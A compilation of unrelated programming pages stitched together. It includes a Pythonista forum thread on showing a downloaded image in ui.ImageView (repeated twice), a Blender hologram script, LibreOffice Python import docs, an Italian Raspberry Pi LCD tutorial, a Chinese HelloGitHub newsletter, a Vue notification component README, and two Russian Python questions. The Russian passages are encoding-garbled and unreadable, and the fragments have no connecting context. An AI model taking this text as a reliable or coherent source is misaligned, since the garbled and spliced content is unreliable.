Shiiiiit sorry lol I had not realized that anyone had replied. I knew I could do that from the beginning, I was just trying to go from jpeg/image object straight to ui.Image/Ui.ImageView.
I ended up just making a list from each requests.get().content and using that.
I was just trying to swim up river to see if I could do it I guess lol.
Ah thank you lol, I got as far as image_data = BytesIO(requests.get().content)
I never thought about using the Context Manager and putting the â.getvalue()â on the image_data. Lol I appreciate the help!
AceNinjaFire
stephen
no problem and dont forget that
ui.Image.from_data()has two arguments.dataandscale
the second (optional) is for Retina Scaling2:1or3:1usually2:1and you would pass2for scale.ui.Image.from_data(image_data.getvalue(), 2)
Caitlins
This post is deleted!last edited by
|
ÐодÑкажиÑе, пожалÑйÑÑа, как иÑпÑавиÑÑ. ÐÑÑÑ ÑпиÑок
list1 = [[], [3, 5, 7], [7, 9, 11, 15], [3, 5, 6, 8, 10], [31, 56, 71], [3, 7, 9, 11], [127, 128, 129]]
нÑжно полÑÑиÑÑ ÑпиÑок
list2 = [[], [3, 5, 7], [9, 11, 15], [6, 8, 10], [31, 56, 71], [], [127, 128, 129]]
Ñ.е. ÑбÑаÑÑ Ð²Ñе повÑоÑÑÑÑиеÑÑ Ð·Ð½Ð°ÑениÑ.
list1 = [[], [3, 5, 7], [7, 9, 11, 15], [3, 5, 6, 8, 10], [31, 56, 71], [3, 7, 9, 11], [127, 128, 129]]
list2 = []
for x1 in list1:
list2.append([])
for y1 in x1:
for x2 in range(len(list1)):
for y2 in x1:
if y1 not in list2:
list2.append(y1)
print(list2)
Ðод вÑводиÑ:
[[], [], 3, 5, 7, [], 9, 11, 15, [], 6, 8, 10, [], 31, 56, 71, [], [], 127, 128, 129]
ÐÑли Ñ Ð¿Ð¸ÑÑ list2[x2].append(y1), Ñо пÑогÑамма завеÑÑаеÑÑÑ Ñ Ð¾Ñибкой IndexError: list index out of range.
|
I wrote a script and I have been focusing on the hologram button I made. I used the selected operator but the button only works when I select the object and then run the script
import bpy
mat = bpy.data.materials.new(name = "Hologram")
mat.diffuse_color = (0,0.519,0.800)
mat.specular_intensity = 0
mat.emit = 1
mat.use_transparency = True
mat.alpha = 0.503
ob = bpy.context.active_object
data = ob.data
def item_type_lst(self,context):
types={obj.type:obj.type for obj in context.scene.objects}
return [(obj,obj,"")for obj in types]
def item_type_obj(self,context):
return[(obj.name,obj.name,"") for obj in context.scene.objects if obj.type==context.scene.myEnumitem]
class SimpleOperator(bpy.types.Operator):
bl_idname="dh.simple_opt"
bl_label="Simple Operator"
def execute(self,context):
if len(ob.data.materials):
ob.data.materials[0] = mat
else:
ob.data.materials.append(mat)
ob.modifiers.new("part", type = 'PARTICLE_SYSTEM')
part = ob.particle_systems[0]
settings = part.settings
settings.frame_start = 4
settings.name = "Hologram"
settings.frame_end = 34
settings.lifetime = 250
settings.count = len(data.polygons)
settings.normal_factor = 0
settings.physics_type = 'NO'
settings.render_type = 'NONE'
settings.effector_weights.gravity = 0
settings.effector_weights.force = 0
D = bpy.data
test = "Hologram"
bpy.ops.texture.new()
text =bpy.data.textures[len(bpy.data.textures)-1]
part = bpy.data.particles[test]
tex = bpy.data.textures.new(test, 'BLEND')
bpy.data.textures[test].use_flip_axis = 'VERTICAL'
slot = part.texture_slots.add()
slot.texture = tex
return{'FINISHED'}
class View3dPanel():
bl_space_type="VIEW_3D"
bl_region_type="TOOLS"
bl_category="Tech"
class PanelA(View3dPanel,bpy.types.Panel):
bl_label="Holograms"
def draw(self,context):
layout=self.layout
layout.operator(operator = "dh.simple_opt",text = "Hologram",icon = "OUTLINER_DATA_LAMP")
self.layout.split()
self.layout.split()
self.layout.split()
col=layout.column(align = True)
col.label(text = "Mesh Objects")
col.operator(operator = "mesh.primitive_cube_add",text = "Cube",icon = "MESH_CUBE")
col.operator(operator = "mesh.primitive_cone_add",text = "Cone",icon = "MESH_CONE")
row=col.row(align = True)
row.operator(operator = "mesh.primitive_monkey_add",text = "Monkey",icon = "MESH_MONKEY")
row.operator(operator = "mesh.primitive_torus_add",text = "Torus",icon = "MESH_TORUS")
col.operator(operator = "mesh.primitive_cylinder_add",text = "Cylinder",icon = "MESH_CYLINDER")
class PanelB(View3dPanel,bpy.types.Panel):
bl_label="Panel B"
def draw(self,context):
layout=self.layout
layout=layout.box()
layout.label(text = "object list",icon = "SORTALPHA")
col=layout.column(align = False)
col.prop(data = context.scene,property = "myEnumitem")
col.prop(data = context.scene,property = "myEnumitem_obj")
bpy.types.Scene.myEnumitem=bpy.props.EnumProperty(name ="Obj Type",items=item_type_lst)
bpy.types.Scene.myEnumitem_obj=bpy.props.EnumProperty(name ="Object",items=item_type_obj)
if __name__=='__main__':
bpy.utils.register_module(__name__)
Thanks in advance
|
How to load an image into image view?
Been trying to get an idea of mine working. I made a script to download galleries, and Iâm trying to set the image view after the image has been downloaded.
But for some reason what I did below doesnât do anything. Could someone tell me what Iâm doing wrong?
import ui,requests,Image
from io import BytesIO
Image_url =“some image urlâ€
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view = ui.ImageView()
Img_view.frame() = testview.frame()
testview.add_subview(img_view)
testview.present()
Img_view.image= ui.Image.from_data(image.tobytes())
AceNinjaFire
Nvm I think I figured it out, it has to be a bytes-like object. I just have to figure out how to get image.tobytes() to byte-like and not bytes
stephen
@AceNinjaFire said:
import ui,requests,Image
from io import BytesIO
Image_url =âsome image urlâ
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view
why not use ui.ImageView.load_from_url(URL)
stephen
@AceNinjaFire
or better yet
import urllib.request, ui
URL = 'https://i.imgur.com/qaAHDac.png'
with urllib.request.urlopen(URL) as url:
with open('temp.jpg', 'wb') as f:
f.write(url.read())
iv=ui.ImageView(image=ui.Image.named('temp.jpg')).present('sheets')
ccc
import io, requests, ui
url = "https://www.python.org/static/community_logos/python-powered-w-200x80.png"
with io.BytesIO(requests.get(url).content) as image_data:
image = ui.Image.from_data(image_data.getvalue())
ui.ImageView(image=image).present()
If you are dealing with lots of images or large images in Pythonista then it is super important to use the
withblock to automate the close of the io.BytesIO and give the garbage collector the opportunity to reclaim the bytes and avoid out-of-memory crashes.ccc
Shiiiiit sorry lol I had not realized that anyone had replied. I knew I could do that from the beginning, I was just trying to go from jpeg/image object straight to ui.Image/Ui.ImageView.
I ended up just making a list from each requests.get().content and using that.
I was just trying to swim up river to see if I could do it I guess lol.
Ah thank you lol, I got as far as image_data = BytesIO(requests.get().content)
I never thought about using the Context Manager and putting the â.getvalue()â on the image_data. Lol I appreciate the help!
AceNinjaFire
stephen
no problem and dont forget that
ui.Image.from_data()has two arguments.dataandscale
the second (optional) is for Retina Scaling2:1or3:1usually2:1and you would pass2for scale.ui.Image.from_data(image_data.getvalue(), 2)
Caitlins
This post is deleted!last edited by
|
LibreOffice Python scripts come in three distinct flavors, they can be personal, shared or embedded in documents. They are stored in varying places described in Python Scripts Organization and Location. In order to import Python modules, their locations must be known from Python at run time.
This mechanism is illustrated for file system based modules and document based modules. Exception handling is omitted for clarity. The terms library or directory, scripts or modules are used interchangeably. A Python macro refers to a function inside a module.
Note that <User Profile>/Scripts/python/pythonpath local directory is always explored when running a Python macro from <User Profile>/Scripts/python.
File System module import
User or Shared Modules
Personal & shared Python scripts can be imported once their directories are included in Python run time path. Refer to Getting session information page for more details regarding omitted Session Class.
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
user_lib = Session().UserPythonScripts # User scripts location
if not user_lib in sys.path:
sys.path.insert(0, user_lib) # Add to search path
import screen_io as ui # 'screen_io.py' module resides in user_lib directory
# Your code follows here
This Python example exposes a local XSCRIPTCONTEXT variable to an imported module:
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import uno, sys
share_lib = Session.SharedPythonScripts() # Shared scripts location
if not share_lib in sys.path:
sys.path.insert(0, share_lib) # Add to search path
from IDE_utils import ScriptContext # 'IDE_utils.py' sits with shared Python scripts.
XSCRIPTCONTEXT = ScriptContext(uno.getComponentContext)
# Your code follows here
Installation Modules for Applications
Unlike personal and shared scripts, LibreOffice installation scripts can be imported any time. Next to uno & unohelper LibreOffice Python modules, other scripts present in <installation_path>/program directory can be imported directly, such as the msgbox module.
With Python shell:
>>> import msgbox, uno
>>> myBox = msgbox.MsgBox(uno.getComponentContext())
>>> myBox.addButton("okay")
>>> myBox.renderFromButtonSize()
>>> myBox.numberOflines = 2
>>> print(myBox.show("A small message",0,"Dialog title"))
Document Module Import
Importing a Python document embedded module is illustrated below. Error handling is not detailed. Python run time path is updated when document has been opened and before closure. Refer to Event-Driven Macros to learn how to associate Python macros to document events.
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys, uno
def OnDocPostOpenLoadPython():
""" Prepare Python modules import when doc. loaded """
PythonLibraries.loadLibrary('lib/subdir') # Add directory to search path
PythonLibraries.loadLibrary('my_gui', 'screen_io') # Add dir. & import screen_io
def OnDocQueryCloseUnloadPython():
""" Cleanup PYTHON_PATH when doc. Gets closed """
PythonLibraries.unloadLibrary('my_gui') # Python runtime path cleanup
# Note: imported modules remain loaded in this example.
class PythonLibraries():
""" Python library loader and module importer
adapted from 'Bibliothèque de fonctions' by Hubert Lambert
at https://forum.openoffice.org/fr/forum/viewtopic.php?p=286213 """
def isImportedModule(module_name: str) -> bool:
""" Check run time module list """
return (module_name in sys.modules.keys())
def isLoadedLibrary(lib_name: str) -> bool:
""" Check PYTHON_PATH content """
return (lib_name in sys.path)
def loadLibrary(lib_name: str, module_name=None):
""" add directory to PYTHON_PATH, import named module """
doc = XSCRIPTCONTEXT.getDocument()
url = uno.fileUrlToSystemPath(
'{}/{}'.format(doc.URL,'Scripts/python/'+lib_name)
if not url in sys.path:
sys.path.insert(0, url)
if module_name and not module_name in sys.modules.keys():
return zipimport.zipimporter(url).load_module(module_name)
def unloadLibrary(lib_name: str):
""" remove directory from PYTHON_PATH """
sys.path.remove(lib_name)
g_exportedScripts = (OnDocPostOpenLoadPython, OnDocQueryCloseUnloadPython)
|
Raspberry Pi: LCD alfanumerico
In questa lezione impareremo a pilotare un display LCD alfanumerico utilizzando il Raspberry Pi.Analizzeremo tutti i passi necessari per effettuare i collegamenti elettrici, descriveremo inoltre come installare la libreria python adatta al controllo del display. Quindi scriveremo un codice “base” per la gestione dello stesso.
In commercio esistono varie tipologie di display, utilizzabili con il Raspberry Pi, che spaziano dai più semplici LCD (Liquid Cristal Display) alfanumerici fino ai più sofisticati touch screen.
Vediamo i principali tipi di display utilizzabili:
LCD alfanumerici: Normalmente organizzati in righe di caratteri. Disponibili in varie dimensioni tra cui le più comuni composte da 2 o 4 righe da 16 o 20 caratteri (16×2 – 16×4 o 20×2 – 20×4). Visualizzano i caratteri ASCII e permettono di avere una mappa di caratteri personalizzabili. Sono di semplice reperibilità, hanno un costo molto contenuto e si programmano facilmente.
LCD grafici: Simili ai precedenti ma con la fondamentale differenza che non visualizzano caratteri ma singoli pixel. Esistono in varie dimensioni, tra cui le più comuni sono 128×64 pixel, 122×32 pixel o 84×48 pixel. Permettono di visualizzare semplici immagini o effetti grafici. Anche questo tipo di display è poco costoso e diffuso nell’ambito maker.
OLED (Organic Light Emitting Diode): Piccoli display grafici con tecnologia OLED sia monocromatici che a colori. Simili ai precedenti come funzionalità, ma normalmente di dimensioni più contenute e più sottili.
TFT (Thin Film Transistor): Sono display a matrice attiva usati negli anni passati per gli schermi dei laptop. Normalmente di dimensioni maggiori (da 3 a 7 pollici), a colori, possono anche esseretouch-screen. Generalmente hanno un costo maggiore dei precedenti e sono più adatti per applicazioni in cui è presente una forte componente grafica.
E-Ink: Display comunemente usati dagli e-book reader. Caratteristica fondamentale è il bassisimo consumo energetico e la capacità di visualizzare un contenuto statico anche in assenza di alimentazione. Tipicamente hanno un costo maggiore e sono utilizzati in applicazioni particolari (spesso fuori dall’ambito maker).
Matrici di Led: Matrici di led mononcromatici o RGB. Esistono in varie dimensioni e i più utilizzati in ambito maker sono moduli da 8×8 pixel componibili. Usati tipicamente per la visualizzazione di scritte e messaggi scorrevoli. Hanno un costo molto contenuto e sono di facile reperibilità e utilizzo.
I display più comuni sono pilotabili tramite il Raspberry Pi usando semplici protocolli paralleli: I2C (Inter-IC) o in alcuni casi tramite connessioni SPI (Serial Peripheral Interface).I display più evoluti, come a esempio i TFT, hanno connessioni HDMI.
Controllo di un LCD Alfanumerico
I più diffusi LCD alfanumerici in ambito maker sono quelli basati sul driver Hitachi HD44780. Pertanto in questa lezione facciamo riferimento a questa tipologia di display.Questi LCD sono forniti da un’ampia platea di fornitori, inclusi tutti quelli presenti sui vari siti di e-commerce di componenti elettronici.Per questo motivo, pur essendo tutti funzionalmente uguali e basati sullo stesso driver di controllo, possono presentare minime differenze. La differenza più importante potrebbe consistere nella disposizione dei pin di controllo.Descriviamo ora tutti e 16 pin con nome e funzionalità:
Pin #1[Vss] Massa
Pin #2[Vdd] Alimentazione
Pin #3[Vo] Controllo contrasto LCD
Pin #4[RS] Register Select
Pin #5[R/W] Modalità Read/Write
Pin #6[E] Enable
Pin #7[DB0] bit dato 0
Pin #8[DB1] bit dato 1
Pin #9[DB2] bit dato 2
Pin #10[DB3] bit dato 3
Pin #11DB4] bit dato 4
Pin #12[DB5] bit dato 5
Pin #13[DB6] bit dato 6
Pin #14[DB7] bit dato 7
Pin BL- Massa per retro illuminazione
Pin BL+ +5V per retro illuminazione
Guardando il display LCD dall’alto, con il connettore orientato verso il basso, partendo dalla destra del connettore, i pin sono disposti quest’ordine: BL+, BL-, #1, #2, #3, #4, #5, #6, #7, #8, #9, #10, #11, #12, #13, #14. Esistono delle variazioni nella disposizione di questi pin ma seguendo il nome e la numerazione la funzionalità di ogni pin rimane invariata. Per realizzare il circuito di controllo, oltre al LCD e al Raspebrry Pi, sono necessari un potenziometro da 10K Ohm, una resistenza da 220 Ohm e 20 fili multicolore maschio-femmina. Il circuito e i collegamenti da effettuare sono mostrati in figura.
Per connettere in maniera ottimale il Raspberry Pi allo LCD effettuare i seguenti collegamenti utilizzando la numerazione fisica dei pin:
Raspberry pin #2 linea + rossa sulla breadboard
Raspberry pin #6 linea – blu sulla breadboard
Raspberry pin #7 LCD pin #14 [DB7]
Raspberry pin #11 LCD pin #13 [DB6]
Raspberry pin #13 LCD pin #12 [DB5]
Raspberry pin #15 LCD pin #11 [DB4]
Raspberry pin #36 LCD pin #6 [E]
Raspberry pin #38 LCD pin #5 [R/W]
Raspberry pin #40 LCD pin #4 [RS]
LCD pin#3 [Vo] pin centrale del potenziometro
LCD pin#2 [Vdd] linea + rossa sulla breadboard
LCD pin#1 [Vss] linea – blu sulla breadboard
LCD pin# BL- linea – blu sulla breadboard
LCD pin# BL+ piedino della resistenza da 220 Omh
altro piedino reistenza linea + rossa sulla breadboard
piedino destro potenziometro linea + rossa sulla breadboard
piedino sinistro potenziometro linea – blu sulla breadboard
Il potenziometro serve per regolare il contrasto del LCD. Si suggerisce di utilizzarlo in caso in cui i caratteri non fossero completamente visibili.
Software di controllo
Per pilotare il display LCD, con il Raspberry Pi, usiamo una libreria python chiamata RPLCD. La libreria supporta diversi tipi di display e quindi va configurata in maniera corretta in base al display utilizzato nel proprio progetto.Da una finestra terminale la libreria si installa con il seguente comando:
sudo pip3 install RPLCD
Si presuppone l’uso di python3 tuttavia la libreria è compatibile anche con python2.Di seguito il codice commentato del programma di controllo.
import sys
from RPLCD.gpio import CharLCD
from RPi import GPIO
import time
RITARDO = 0.5
#Inizializza il display LCD
lcd = CharLCD(numbering_mode=GPIO.BOARD, cols=16, rows=2, pin_rs=40, pin_rw=38, pin_e=36, pins_data=[15, 13, 11, 7])
#imposta la retro illuminazione e nasconde il cursore
lcd.backlight = True
lcd.cursor_mode = 'hide'
#cancella il display
lcd.clear()
#posiziona il cursore sulla prima linea alla colonna 5
lcd.cursor_pos = (0, 5)
#stampa una stringa
lcd.write_string("Hello")
#posiziona il cursore sulla seconda linea alla colonna 1
lcd.cursor_pos = (1, 1)
lcd.write_string("Raspberry Pi!!")
time.sleep(1)
#effettuta lo scroll delle scritte a destra e sinstra
for _ in range(16):
lcd.shift_display(-1)
time.sleep(RITARDO)
while True:
for _ in range(32):
lcd.shift_display(1)
time.sleep(RITARDO)
for _ in range(32):
lcd.shift_display(-1)
time.sleep(RITARDO)
La classe CharLCD fornisce una semplice interfaccia al display LCD e ne permette il controllo di ogni singolo aspetto.Come per le connessioni elettriche anche nel codice si usa la numerazione fisica per i pin del Raspberry Pi.Nel costruttore della classe bisogna passare alcuni parametri fondamentali:
cols e rows: sono il numero di colonne e righe del proprio display LCD.
pin_rs: corrisponde al pin #4 del LCD ed è collegato al pin#40 del Raspberry.
pin_rw: corrisponde al pin #5 del LCD ed è collegato al pin#38 del Raspberry.
pin_e: corrisponde al pin #6 del LCD ed è collegato al pin#36 del Raspberry.
pin_data: una lista di 4 o 8 pin corrispondenti ai pin DB0-7 del LCD. In questo caso per ridurre il numero di connessioni viene utilizzata una modalità a 4 bit di dato.
Se tutti i passaggi sono stati eseguiti correttamente, si dovrebbe ottenere un risultato simile alla figura sottostante.
In questa lezione abbiamo fatto una panoramica sulle più comuni tipologie di display per Raspberry Pi in ambito maker. Successivamente abbiamo descritto in dettaglio la piedinatura del LCD, con driver Hitachi HD44780, e descritto le connessioni elettriche necessarie per il suo corretto funzionamento.Un codice di controllo e verifica, del funzionamento del LCD, è stato fornito e analizzato subito sopra, quest’ultimo potrà essere utilizzato come base di partenza per le vostre implementazioni.
Se vuoi aggiornamenti su display, Raspberry Pi inserisci la tua email nel box qui sotto:
Compilando il presente form acconsento a ricevere le informazioni relative ai servizi di cui alla presente pagina ai sensi dell'informativa sulla privacy.
La tua iscrizione è andata a buon fine. Se vuoi ricevere informazioni personalizzate compila anche i seguenti campi opzionali:
Compilando il presente form acconsento a ricevere le informazioni relative ai servizi di cui alla presente pagina ai sensi dell'informativa sulla privacy.
I Video di HTML.it
Code-in-motion: coniugare l’illustrazione vettoriale con il codice
I video brevi (e in loop!) stanno invadendo Internet: i due cofounder di ILLO ci illustrano le tecniche per creare […]
|
《HelloGitHub》第 12 期
兴趣是最好的老师,
HelloGitHub就是帮你找到兴趣!
简介
分享 GitHub 上有趣、入门级的开源项目。
这是一个面向编程新手、热爱编程、对开源社区感兴趣 人群的月刊,月刊的内容包括:各种编程语言的项目、让生活变得更美好的工具、书籍、学习笔记、教程等,这些开源项目大多都是非常容易上手,而且非常 Cool。主要是希望大家能动手用起来,加入到开源社区中。
– 会编程的可以贡献代码
– 不会编程的可以反馈使用这些工具中的 Bug
– 帮着宣传你觉得优秀的项目
– Star 项目⭐️
在浏览、参与这些项目的过程中,你将学习到更多编程知识、提高编程技巧、找到编程的乐趣。
? 最后 HelloGitHub 这个项目就诞生了 ?
以下为本期内容|每个月28号发布最新一期|点击查看往期内容
C 项目
C# 项目
2、ScreenToGif:此工具可以记录屏幕的选定区域、网络摄像头的实时图像和绘图板上的实时图像。可以编辑并将动画保存为 GIF 或视频
Go 项目
3、wuzz:wuzz 是用于调试 HTTP 请求的交互式命令行工具,可以用来检查和修改请求。常用操作如下:
Keybinding Description
Ctrl+R 发送请求
Ctrl+C 退出
Ctrl+K,Shift+Tab 前视图
Ctlr+J,Tab 下一个视图
Ctrl+H,Alt+H 打开/关闭历史
Down 向下移动一条视图线
Up 向上移动一条视图线
Page down 向下移动一个视图页
Page up 向下移动一个视图页
F2 跳转到 URL
F3 跳转到查询参数
F4 跳转到 HTTP 方法
F5 跳转到请求体
F6 跳转到 header
F7 跳转到搜索
F8 跳转到响应 header
F9 跳转到响应体
4、sshtron:sshtron 是通过 SSH 运行的多人贪吃蛇游戏,命令行输入:ssh sshtron.zachlatta.com,无需安装等待几秒即可进行游戏(因为服务器在国外,很卡?)
Java 项目
JavaScript 项目
6、vue2-elm:基于 vue2 + vuex 构建一个大型单页面应用,此项目大大小小共 45 个页面,涉及注册、登录、商品展示、购物车、下单等等,是一个完整的流程,
9、octotree:为 GitHub 和 GitLab 网站,提供直观地显示项目目录结构的浏览器插件,效果如下:
Objective-C 项目
10、bitbar:Bitbar 是可以将任何(自己或别人写好的)脚本的输出到 Mac OS 的状态栏上。同时,支持自定义更新频率。例如:定时获取比特币的价格、HelloGitHub 项目的 star 数量,使用步骤如下:
运行该程序,选择脚本所在目录
确保脚本的有执行权限,赋予执行权限的命令:chmod +x script.sh
选择 Refresh all,刷新使之生效
Python 项目
11、mycli:mycli 是一个带语法高亮、自动补全的 MySQL 命令行客户端工具。例如,连接数据库方法:mycli -h localhost -u 用户名 数据库
12、python-fire:Fire 是 Google 开源的 Python 库,可自动将您的代码转变成 CLI,无需您做任何额外工作。您不必定义参数,设置帮助信息,或者编写定义代码运行方式的 main 函数。相反,您只需从 main 模块调用“Fire”函数,其余工作全部交由 Python Fire 来完成。示例代码如下:
import fire
class Example(object):
def hello(self, name='world'):
"""Says hello to the specified name."""
return 'Hello {name}!'.format(name=name)
def main():
fire.Fire(Example)
if __name__ == '__main__':
main()
# 在终端中调用效果如下:
$ ./example.py hello
Hello world!
$ ./example.py hello David
Hello David!
$ ./example.py hello --name=Google
Hello Google!
其它
14、node-interview:如何通过饿了么 Node.js 面试
15、gophers:Go 吉祥物的各种图片素材
16、algs4:(英文)算法第四版书中的示例代码(Java)
开源书籍
17、explore-python:《Python 之旅》,该书总结了 Python 相关的知识点,力求深入浅出、条理清晰
18、The-Art-Of-Programming-By-July:《编程之法:面试和算法心得》
19、react-naive-book:开源、免费、专业、简单的 React.js 教程
换种方式阅读
网站:https://hellogithub.com
GitBook:https://gitbook.hellogithub.com
声明
如果你发现了好玩、有意义的开源项目 点击这里 分享你觉得有意思的项目。
欢迎转载,请注明出处和作者,同时保留声明。
|
Simple Notify Handler For Vue.js
A simple, pretty, clean notification component for Vue.js app.
Vue Simple Notify
Simple notify handler component for Vue.js.
Demo
Quick Start
NPM
Install the package:
$ npm install vue-simple-notify
Register the component:
import Vue from 'vue'
import VueSimpleNotify from 'VueSimpleNotify'
Vue.component('VueSimpleNotify', VueSimpleNotify)
Use the component:
<vue-simple-notify :items="[]"></vue-simple-notify>
CDN
Include styles:
<link href="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.css">
Include scripts:
<script src="https://unpkg.com/vue/dist/vue.js"></script>
<script src="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.js"></script>
Register the component:
Vue.component('VueSimpleNotify', VueSimpleNotify.VueSimpleNotify)
Use the component:
<vue-simple-notify :items="[]"></vue-simple-notify>
Examples
Examples of use for this component:
- Using CDN:
<!DOCTYPE html>
<html>
<head>
<link href="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no, minimal-ui">
</head>
<body>
<div id="app">
<vue-simple-notify :items="[]"></vue-simple-notify>
</div>
<script src="https://unpkg.com/vue/dist/vue.js"></script>
<script src="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.js"></script>
<script>
Vue.component('VueSimpleNotify', VueSimpleNotify.VueSimpleNotify)
new Vue().$mount('#app')
</script>
</body>
</html>
- Adding items:
<vue-simple-notify
:items="items"
></vue-simple-notify>
new Vue({
el: '#app',
components: { VueSimpleNotify },
data () {
return {
items: [
{
message: 'example of error message.'
},
{
type: 'Success',
color: '#2ecc71',
dismissable: false,
message: 'example of success message.'
}
]
}
}
})
- Setting the delay between notifications:
<vue-simple-notify
:items="items"
:delay="delay"
></vue-simple-notify>
new Vue({
el: '#app',
components: { VueSimpleNotify },
data () {
return {
items: [{}, {}, {}],
delay: 1000
}
}
})
- Listening to the @onDismiss event:
<vue-simple-notify
:items="items"
@onDismiss="onDismiss"
></vue-simple-notify>
new Vue({
el: '#app',
components: { VueSimpleNotify },
data () {
return {
items: [{}]
}
},
methods: {
onDismiss: function onDismiss (index) {
console.log(index)
}
}
})
- Removing items from the component.
<vue-simple-notify
:items="items"
ref="vsn"
></vue-simple-notify>
const vueSimpleNotify = new Vue({
el: '#app',
components: { VueSimpleNotify },
data () {
return {
items: [{}, {}, {}]
}
}
}).$refs.vsn
vueSimpleNotify.dismiss(1)
- Removing all elements.
<vue-simple-notify
:items="items"
ref="vsn"
></vue-simple-notify>
const vueSimpleNotify = new Vue({
el: '#app',
components: { VueSimpleNotify },
data () {
return {
items: [{}, {}, {}]
}
}
}).$refs.vsn
vueSimpleNotify.clear()
Props
Available props in this component:
:items
Description: Notifications array.
Type: Array
Required: true
Default: null
<vue-simple-notify :items="[]">
:delay
Description: Time interval between notifications when displayed.
Type: Number
Default: 500
<vue-simple-notify :items="[]" :delay="1000">
Events
Available events in this component:
@onDismiss
It is triggered each time a notification is dismissed.
onDismiss: function onDismiss (index) { }
Attribute Type Description
index Number Notification index.
<vue-simple-notify :items="[]" :delay="1000" @onDismiss="onDismiss">
Methods
Available methods in this component:
dismiss
Dismiss a notification by a index.
vueSimpleNotify.dismiss(index)
Attribute Type Description Required
index Number Notification index. true
clear
Clear all notifications.
vueSimpleNotify.clear()
Tests
Clone the repository:
$ git clone https://github.com/Josantonius/vue-simple-notify.git vue-simple-notify
Go to the directory:
$ cd vue-simple-notify
Install dependencies:
$ npm install
Run unit tests:
$ npm run test$ npm run lint
Run serve with hot reload:
$ npm run dev
Build distribution with minification:
$ npm run bundle
Build demo for production with minification:
$ npm run build
Run all the above:
$ npm run finish
☑ TODO
[ ] Fix error when trying to pass ESlint tests in Travis CI.
[ ] Fix error when trying to pass E2E tests in Travis CI.
[ ] Add new feature.
[ ] Improve tests.
[ ] Improve documentation.
Contribute
Pull requests
Fork and clone.
Make changes and run the tests.
Create a branch,commit,pushand send me a pull request.
License
This project is licensed under MIT license. See the LICENSE file for more info.
Copyright
2018 Josantonius, josantonius.com
If you find it useful, let me know :wink:
Github Repository
Tags: #VueJs
|
Я загÑÑзил ÐаннÑе и обознаÑил пеÑеменнÑе, а заÑем пÑеобÑазовал вÑбоÑÐºÑ Ð² маÑÑив.
df1 = pd.read_csv('gbm-data.csv')
Y = df1['Activity']
X = df1.drop(['Activity'], axis=1)
df2 = df1.values`
ÐоÑле ÑÐ°Ð·Ð´ÐµÐ»ÐµÐ½Ð¸Ñ Ð´Ð°Ð½Ð½ÑÑ , на обÑÑаÑÑÑÑ Ð¸ ÑеÑÑовÑÑ Ð²ÑбоÑки:
X_train, X_test, y_train, y_test = train_test_split(X1, Y1, test_size=0.8, random_state=241
Ðне необÑ
одимо обÑÑиÑÑ GradientBoostingClassifier Ñ Ð¿Ð°ÑамеÑÑами n_estimators=250, verbose=True, random_state=241 и Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ знаÑÐµÐ½Ð¸Ñ learning_rate из ÑпиÑка [1, 0.5, 0.3, 0.2, 0.1] вÑполниÑÑ ÑледÑÑÑее:
ÐÑполÑзÑйÑе меÑод staged_decision_functionÐ´Ð»Ñ Ð¿ÑедÑÐºÐ°Ð·Ð°Ð½Ð¸Ñ ÐºÐ°ÑеÑÑва на обÑÑаÑÑей и ÑеÑÑовой вÑбоÑке на каждой иÑеÑаÑии.
ÐÑеобÑазÑйÑе полÑÑенное пÑедÑказание Ñ Ð¿Ð¾Ð¼Ð¾ÑÑÑ Ñигмоидной ÑÑнкÑии по ÑоÑмÑле 1 / (1 + e^{ây_pred}), где y_predâ пÑедÑказанное знаÑение.
ÐÑÑиÑлиÑе и поÑÑÑойÑе гÑаÑик знаÑений log-loss(коÑоÑÑÑ Ð¼Ð¾Ð¶Ð½Ð¾ поÑÑиÑаÑÑ Ñ Ð¿Ð¾Ð¼Ð¾ÑÑÑ ÑÑнкÑииsklearn.metrics.log_loss) на обÑÑаÑÑей и ÑеÑÑовой вÑбоÑÐºÐ°Ñ , а Ñакже найдиÑе минималÑное знаÑение меÑÑики и Ð½Ð¾Ð¼ÐµÑ Ð¸ÑеÑаÑии, на коÑоÑой оно доÑÑигаеÑÑÑ.
Я напиÑал ÑледÑÑÑий адапÑиÑованнÑй под Ð´Ð»Ñ Ð¿Ð¾ÑÑÑÐ¾ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð¸Ñ Ð¼Ð¾Ð´ÐµÐ»ÐµÐ¹ и ÑÐ¾Ñ ÑÐ°Ð½ÐµÐ½Ð¸Ñ ÑезÑлÑÑаÑов Ð¸Ñ Ð²ÑÑиÑлениÑ:
common_args = {'verbose': True, 'n_estimators': 250,'random_state': 241}
models = [('first', GradientBoostingClassifier(learning_rate=1, **common_args)),
('second', GradientBoostingClassifier(learning_rate=0.5, **common_args)),
('third', GradientBoostingClassifier(learning_rate=0.3, **common_args)),
('forth', GradientBoostingClassifier(learning_rate=0.2, **common_args)),
('fifth', GradientBoostingClassifier(learning_rate=0.1, **common_args)),
]
stage_preds = []
final_preds = []
y_pred = []
Lloss = []
sigmaYpred = []
for mname, m in models:
m.fit(X_train, y_train)
stage_preds[mname] = {'X_train': list(m.staged_decision_function(X_train)), 'X_test': list(m.staged_decision_function(X_test))}
y_pred[mname] = {'X_test': m.predict_proba(X_test)}
sigmaYpred[mname] = 1 / (1 + np.exp((-1)*y_pred))
Lloss[mname] = {'y_train': list(log_loss(y_train, sigmaYpred[mname])), 'y_test': list(log_loss(y_test, sigmaYpred[mname]))}
Ðо полÑÑÐ°Ñ Ð¿Ð¾ÑÑоÑнно ÑÑÑ Ð¾ÑибкÑ:
Traceback (most recent call last): File "", line 15, in stage_preds[mname] = {'X_train': list(m.staged_decision_function(X_train)), 'X_test': list(m.staged_decision_function(X_test))} TypeError: list indices must be integers or slices, not str
